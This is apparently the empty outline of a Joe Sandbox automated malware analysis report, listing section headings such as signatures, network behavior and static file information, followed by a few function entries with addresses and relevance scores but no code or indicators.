Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 7249868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Function 72498690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 724985E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 7249870A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 72498710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON